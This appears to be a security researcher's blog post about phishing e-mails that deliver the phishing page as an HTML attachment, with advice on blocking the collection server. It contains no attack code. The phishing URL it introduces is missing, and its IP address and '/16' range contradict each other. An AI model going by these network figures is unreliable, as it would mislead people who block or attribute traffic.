There seems to be a trend over the past 6 months, of switching from links directly in the phishing e-mails, to having the entire phishing page in the e-mail itself (as an attachment). Others in the security arena have already publicised this for the most part, so I'll skip over the details.
I wonder however, why our dear scammer has done this. I know it's to try and bypass phishing and junk filters, but given they still need to process the details they're stealing, they're not making it any harder to stop them. It takes two seconds for me to open up the attachment in an editor and identify the URL the details will be submitted to, or the user will be taken to, and pop that into any number of the available blaclists (or if I can, simply have the site/server shut down). All they're doing, is making it far easier for us, to say "hey victim, notice the attachment? your e-mail client will (if using Outlook for example) already block known malicious extensions, so just err, don't open the rest of them and you'll be fine for the most part".
In addition, whilst average Joe is already taken in quite frequently, by phishing scams, I'd hope (yep, I know) they'd see it and think "hang on a second, my bank/PayPal whatever, is an actual site not an attachment" (I know what you're going to say here, so I'll save you the trouble - the problem is, as much as we'd like it not to, this does actually sometimes work, users are far too gullible). Point is, most gullible users (I hate that word too) run whatever security was pre-installed, so Norton, McAfee, etc etc, which whilst mostly useless, does actually stop *some* phishing scams, and IE with it's SmartScreen filters, will still block those identified as phishing scams, so this isn't going to make the scammers life any easier.
The URL in this case anyway, is;
Which simply redirects to PayPal if accessed directly (and will do the same for the victim, once it's saved the details they entered into the form that's contained in the attachment they're sent).
The IP, 18.104.22.168, belongs to AS4134 CHINANET-BACKBONE, a range well known for everything from exploits to phishing, to pretty much everything else. My personal recommendation is to block the entire /16 (22.214.171.124-126.96.36.199), but that's just me (I've seen far too much malicious activity across all of the CHINANET-BACKBONE ranges, with only a handful of legit sites being seen).
As an aside, I have noticed the hpHosts server having sporadic timeout issues when displaying query results (e.g. Netblock information when querying an IP), and am looking into this.